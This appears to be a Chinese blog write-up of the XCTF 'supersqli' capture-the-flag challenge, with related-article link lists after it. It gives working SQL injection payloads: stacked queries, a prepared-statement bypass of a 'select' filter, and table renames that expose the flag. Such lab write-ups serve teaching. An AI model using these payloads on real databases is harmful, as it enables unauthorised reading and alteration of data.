关于sqil的题目，这个真的是知识面太杂了。我研究了好几天，才看懂了这个题解。

打开场景以后，发现的是一个文本框，然后试一下有没有sql注入

先输入1发现回显正常，然后输入1‘发现出现错误，然后就可以判断存在sql注入

然后判断一下有几列，进行 1' order by 2#回显正常，但是1' order by 3#回显错误，所以可以确定一共有2列

发现select被禁用

然后就想到运用推叠注入，

想到首先查询一下数据库，然后发现supersqli这个就是要找的数据库

然后进行查表操作,

分别查询两个表的字段：
(字符串为表名进行操作时要加反引号）

'; show columns from `1919810931114514` ;--+

'; show columns from `words` ;--+

发现了可疑的flag,

方法1：采用预编译绕过，

';sEt @sql = CONCAT('se','lect * from `1919810931114514`;');prEpare stmt from @sql;EXECUTE stmt;#

解释：

';sEt @sql = CONCAT(‘se’,‘lect * from 1919810931114514;’); 进行预编译
prEpare stmt from @sql; 设置变量
EXECUTE stmt;# 执行

得出了最后的flag

方法二：可能比较绕

根据在words表里发现id字段与查询框里的出的数据类型相同，一个数字，一个字符串，所以猜测默认查询的就是words表，inject（搜索框中）值应该赋给了id
利用：我们可以将含有flag字段的表命名为word，然后修改字段名字，不就查询到我们想要的结果！（前提是这里rename，alert关键字 没有做过滤）
;  alter tables words rename to words1; 
;  alter tables `1919810931114514` rename to words ;
;  alter tables words change flag id varchar(50); #

查看flag：1' or 1=1 # 然后最终得出来flag

攻防世界——supersqli进阶相关推荐

1. misc高阶 攻防世界_攻防世界 Misc 进阶题（一）

   攻防世界 Misc 进阶题(一) 关于隐写术的思路或方法 转载: https://blog.csdn.net/a_small_rabbit/article/details/79644078     隐 ...

2. 攻防世界MISC进阶区刷题记录

   文章目录 攻防世界MISC进阶区刷题记录 Ditf 运用stegextract进行分离 glance-50 gif图片分离组合脚本 hit-the-core Test-flag-please-igno ...

3. 攻防世界 pwn进阶区----No.012 babyfengshui 解题思路

   攻防世界 pwn进阶区----No.012 babyfengshui 解题思路 1.本题解题思路 1.先期工作 1.运行程序查看基本逻辑 创建用户 展示用户 更新用户 删除用户 到这里就可以猜测这题有 ...

4. 攻防世界高手进阶区——dice_game

   攻防世界高手进阶区--dice_game 题目里面啥都没有. 一.分析文件 checksec 只有栈溢出保护关闭了,其他都是开着的. 运行 可以看出是要猜数字,猜对50次. ida逆向 __int64 ...

5. 攻防世界 Pwn 进阶 第二页

   00 这文章更重要的是对这些题进行一个总结,说一些值得注意的地方,写一些自己的理解. 为了形成一个体系,想将前面学过的一些东西都拉来放在一起总结总结,方便学习,方便记忆. 攻防世界 Pwn 新手 攻防 ...

6. 攻防世界MISC进阶之misc1

   攻防世界MISC进阶之misc1 第一步:分析 第二步:实操 第三步:答案 第一步:分析 难度系数: 3星 题目来源: DDCTF-2018 题目描述:d4e8e1f4a0f7e1f3a0e6e1f3 ...

7. 攻防世界高手进阶区 ——forgot

   攻防世界高手进阶区 --forgot 看了半天,啥也没看懂,做出来了才发现啥也不是. 一,分析文件 checksec 还好,只开启了堆栈不可执行. 运行一下 翻译了一下,应该是判断邮箱是否合乎规矩. ...

8. Revers篇：攻防世界reverse进阶re2-cpp-is-awesome

   攻防世界reverse进阶re2-cpp-is-awesome IDA分析 很简单的一个程序 程序流程分析 首先检查参数,参数少于2就退出,并提示:Usage: ./re2-cpp-is-awesom ...

9. 攻防世界web进阶区Web_php_wrong_nginx_config详解

   攻防世界web进阶区Web_php_wrong_nginx_config详解 题目 详解 题目 打开发现无论我们输入什么他都会弹出网站建设不完全 那么我们使用御剑进行扫描,扫描到了admin和robo ...

最新文章

1. 安全产品研发与落地的一些方法与思考
2. Eliminate Witches!【2011年北京赛区正赛赛题-2】
3. (第四篇)Vue生命周期
4. 【Linux系统编程】IO多路复用之poll
5. 底量超顶量超级大黑马指标源码_一旦出现底量超顶量形态，是超级大黑马诞生！...
6. 【ES6(2015)】Map
7. apache伪静态把css 排除掉_（02）CSS 选择器详解 | CSS
8. MFC开发IM-第二十六篇、vs2008添加库文件
9. Spring Boot单元测试入门实战之关于JUnit
10. 92. php 命名空间(2)
11. OpenLdap-如何使用phpLdapAdmin创建CN用户、OU用户组
12. 离散时间傅里叶变换（DTFT）与离散傅里叶级数（DFS）
13. 爬虫：Instagram信息爬取
14. STM32 F107VC移植freeRTOS
15. 2022年最新前端零基础学习路径
16. ofo小黄跑路，中国人素质真的差吗？
17. 亿级流量电商详情页系统实战-25.亿级流量商品详情页的多级缓存架构介绍
18. win10计算机服务打不开,win10系统设置打不开怎么办
19. Hibernate中ManyToOne删除Many的一方出现 deleted object would be re-saved by cascade
20. 结合DDE指标来分析成本分布的重要作用

热门文章

1. 【LangChain】LLM
2. 洛谷P1706全排列问题题解（两种方法+详解）
3. 5种常见的电子商务模式
4. UVa 11329 - Curious Fleas
5. 个人对 Python 数据类型理解整理所得 以及深/浅copy
6. eclipse中如何使用Git/gitee【雷哥】pull拉代码，commit提交到本地，Push推送到服务器
7. 打PSU补丁CRS没有起来
8. Win10 实用黑科技
9. 2023全网首发最新源支付.码支付.可对接易支付.三网云端免挂码
10. Java拖拽排序工具类